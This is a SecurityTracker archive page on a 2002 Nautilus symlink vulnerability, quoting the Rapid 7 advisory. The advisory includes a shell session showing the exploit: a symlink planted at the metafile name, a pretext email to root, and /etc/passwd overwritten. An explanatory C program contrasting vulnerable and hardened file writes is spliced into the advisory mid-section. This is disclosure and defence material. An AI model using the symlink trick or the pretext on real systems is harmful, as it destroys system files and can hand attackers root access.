SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Generic)  >   Nautilus (GNOME) Vendors:   Gnome Development Team
Nautilus GNOME Shell and File Manager Symlink Hole May Let Local Users Cause Other Users to Overwrite Files on the System
SecurityTracker Alert ID:  1004212
SecurityTracker URL:  http://securitytracker.com/id/1004212
CVE Reference:   CVE-2002-0157   (Links to External Site)
Date:  May 2 2002
Impact:   Modification of system information, Modification of user information, Root access via local system, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 1.0.4
Description:   A temporary file symbolic link (symlink) vulnerability was reported in Nautilus, the GNOME shell and file manager. A local user could cause another user to overwrite files on the system. In some cases, this could allow a local user to obtain root privileges on the system.

Rapid 7 reports that when a local user copies files from one directory to another directory, Nautilus will create a small (88+ bytes) XML file named '.nautilus-metafile.xml' in the target directory. The software apparently does not check to see if a symlink with the same name already exists before writing to it.

A local user could create a symlink, named after the Nautilus XML metafile, in a directory the local user controls and point it at a critical file. The local user could then convince another user on the system to copy a file into that directory. When the other user performs the copy with Nautilus, Nautilus writes to the XML metafile name, following the symlink, so the linked file is overwritten with the privileges of the other user.

Impact:   A local user can cause files to be overwritten by other users when those users invoke Nautilus to perform certain copying functions. If the other user is root, the local user could obtain root-level access on the system.
Solution:   The vendor has reportedly released a fix in CVS. Download a more recent version from:

http://cvs.gnome.org/lxr/source/nautilus/

Vendor URL:  nautilus.eazel.com/ (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Red Hat Issues Fix) Re: Nautilus GNOME Shell and File Manager Symlink Hole May Let Local Users Cause Other Users to Overwrite Files on the System
Red Hat has issued a fix.



 Source Message Contents

Subject:  Nautilus Symlink Vulnerability


_____________________________________________________________________
                   Rapid 7, Inc. Security Advisory

          Visit http://www.rapid7.com/ to download NeXpose(tm), our
          advanced vulnerability scanner. Linux and Windows 2000
          versions are available now!
_______________________________________________________________________

Rapid 7 Advisory R7-000x: Nautilus Symlink Vulnerability

    Published:  Not yet published.
    Revision:   1.0
    CVE ID:     CAN-2002-0157
    Bugtraq ID: Not yet assigned.

1. Affected system(s):

    KNOWN VULNERABLE:
     o Nautilus 1.0.4

    Apparently NOT VULNERABLE:

2. Summary

    Nautilus is a graphical shell for GNOME.  It contains a vulnerability
    which would allow a malicious user to mount a symlink attack to
    overwrite another user's files.

    The Common Vulnerabilities and Exposures (CVE) project has assigned
    the identifier CAN-2002-0157 to this issue. This is a candidate for
    inclusion in the CVE list (http://cve.mitre.org/), which standardizes
    names for security problems.

    BUGTRAQ has assigned the identifier xxx to this vulnerability.
    More information on BUGTRAQ can be found at
    http://www.securityfocus.com/.

3. Vendor status and information

    Nautilus
    Eazel, Inc.
    http://nautilus.eazel.com/

Vendor notified 03/26/2002.

4. Solution



5. Detailed analysis

    When copying files from one directory to another, Nautilus creates a
    small (88+ bytes) XML file called '.nautilus-metafile.xml' in the
    target directory.  It does not check if a symlink with the same name
    already exists there, and blindly writes XML data to it.  The
    following example shows how to cause a system-wide denial of service
    attack with this vulnerability:

    [jdog@imisshogs jdog]$ pwd
    /home/jdog
    [jdog@imisshogs jdog]$ cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    [...snip...]
    jdog:x:500:500::/home/jdog:/bin/bash
    [jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml
    [jdog@imisshogs jdog]$ mail root
    Subject: Yo.
        Could you please copy "lonely-in-new-york.doc" to my home
    directory (/home/jdog)?  Thanks.

        - Joe
    Cc: 
    [jdog@imisshogs jdog]$ sleep 86400
    [jdog@imisshogs jdog]$ ls -l *.doc
    -rw-r--r--    1 root     root           13 Mar 24 18:09 lonely-in-new-york.doc
    [jdog@imisshogs jdog]$ cat /etc/passwd
    <?xml version="1.0"?>
    <directory>
    <file name="lonely-in-new-york.doc" icon_position="55,105"/>
    </directory>
    [jdog@imisshogs jdog]$
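The defect described in the SecurityTracker summary above and in section 5 of the advisory is a blind `fopen(path, "w")`-style write that follows whatever symlink already sits at the metafile name. The following C program is an added illustration written for this page; it is not Nautilus code and not part of the Rapid 7 advisory. It places the vulnerable write pattern next to a hardened one (`O_NOFOLLOW` so the kernel refuses a symlink atomically with the open, then an `fstat` on the descriptor to confirm a regular, single-link file owned by the caller before truncating), and reproduces the scenario in a throwaway temporary directory: a constructed "victim" file stands in for `/etc/passwd`. Function names, the `/tmp/nautilus-demo-XXXXXX` directory template and the victim file contents are assumptions of this example.

```c
#define _GNU_SOURCE /* O_NOFOLLOW, O_CLOEXEC, mkdtemp, symlink on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Metafile body taken from the advisory's example output. */
static const char METAFILE_XML[] =
    "<?xml version=\"1.0\"?>\n<directory>\n"
    "<file name=\"lonely-in-new-york.doc\" icon_position=\"55,105\"/>\n"
    "</directory>\n";

/* Vulnerable pattern (as the advisory describes it): fopen(.., "w")
 * follows a symlink at `path` and truncates whatever it points to. */
static int write_metafile_unsafe(const char *path, const char *data)
{
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(data, f);
    return fclose(f);
}

/* Hardened write. O_NOFOLLOW makes the open fail with ELOOP when the last
 * path component is a symlink; the check is atomic with the open, so there
 * is no lstat-then-open race window. O_TRUNC is deliberately left out:
 * we truncate only after fstat confirms what we actually opened. */
static int write_metafile_safe(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0644);
    if (fd < 0) return -1;                       /* ELOOP: symlink sat there */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);                               /* not our plain file */
        errno = EPERM;
        return -1;
    }
    if (ftruncate(fd, 0) != 0) { close(fd); return -1; }
    size_t len = strlen(data);
    int rc = (write(fd, data, len) == (ssize_t)len) ? 0 : -1;
    if (close(fd) != 0) rc = -1;
    return rc;
}

/* Read up to `cap` bytes of a file; returns byte count or -1. */
static ssize_t slurp(const char *path, char *buf, size_t cap)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, cap);
    close(fd);
    return n;
}

/* Constructed scenario: a victim file plus a symlink to it under the
 * metafile name, then one write through the symlink.
 * Returns 0 if the victim was clobbered (vulnerable behaviour),
 *         1 if the write was refused and the victim is intact (hardened),
 *        -1 on setup failure. The temp directory is removed afterwards. */
int simulate_metafile_write(int hardened)
{
    char dir[] = "/tmp/nautilus-demo-XXXXXX";      /* assumed template */
    if (!mkdtemp(dir)) return -1;
    char target[256], link[256], buf[256];
    snprintf(target, sizeof target, "%s/victim.txt", dir);
    snprintf(link, sizeof link, "%s/.nautilus-metafile.xml", dir);
    const char *original = "root:x:0:0:root:/root:/bin/bash\n"; /* constructed */
    int rc = -1;
    FILE *f = fopen(target, "w");
    if (f && fputs(original, f) >= 0 && fclose(f) == 0 &&
        symlink(target, link) == 0) {
        int w = hardened ? write_metafile_safe(link, METAFILE_XML)
                         : write_metafile_unsafe(link, METAFILE_XML);
        ssize_t n = slurp(target, buf, sizeof buf);
        int intact = n == (ssize_t)strlen(original) &&
                     memcmp(buf, original, (size_t)n) == 0;
        rc = (w != 0 && intact) ? 1 : 0;
    }
    unlink(link); unlink(target); rmdir(dir);
    return rc;
}

/* Positive path: the hardened writer still creates a fresh metafile.
 * Returns 1 when the file exists afterwards with exactly the XML body. */
int hardened_write_fresh(void)
{
    char dir[] = "/tmp/nautilus-demo-XXXXXX";
    if (!mkdtemp(dir)) return -1;
    char path[256], buf[256];
    snprintf(path, sizeof path, "%s/.nautilus-metafile.xml", dir);
    int w = write_metafile_safe(path, METAFILE_XML);
    ssize_t n = slurp(path, buf, sizeof buf);
    int ok = w == 0 && n == (ssize_t)strlen(METAFILE_XML) &&
             memcmp(buf, METAFILE_XML, (size_t)n) == 0;
    unlink(path); rmdir(dir);
    return ok;
}

int main(void)
{
    printf("unsafe writer, symlink present : %d (0 = victim clobbered)\n",
           simulate_metafile_write(0));
    printf("safe writer, symlink present   : %d (1 = refused, intact)\n",
           simulate_metafile_write(1));
    printf("safe writer, fresh path        : %d (1 = metafile written)\n",
           hardened_write_fresh());
    return 0;
}
```

The `st_nlink != 1` and `st_uid != geteuid()` checks cover the variant where a hard link rather than a symlink is planted under the metafile name; `O_NOFOLLOW` alone does not catch that. On Linux the refused open reports `ELOOP`, which is the condition a defender would log or alert on when auditing a file manager or any other program that writes fixed-name files into user-controlled directories.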

6. Contact Information

       Rapid 7 Security Advisories
       Email:   advisory@rapid7.com
       Web:     http://www.rapid7.com/
       Phone:   +1 (212) 558-8700

7. Disclaimer and Copyright

    Rapid 7, Inc. is not responsible for the misuse of the information
    provided in our security advisories. These advisories are a service
    to the professional security community.  There are NO WARRANTIES
    with regard to this information. Any application or distribution of
    this information constitutes acceptance AS IS, at the user's own
    risk.  This information is subject to change without notice.

    This advisory Copyright (C) 2002 Rapid 7, Inc.  Permission is
    hereby granted to redistribute this advisory in electronic media
    only, providing that no changes are made and that the copyright
    notices and disclaimers remain intact.  This advisory may not be
    printed or distributed in non-electronic media without the
    express written permission of Rapid 7, Inc.


Copyright 2021, SecurityGlobal.net LLC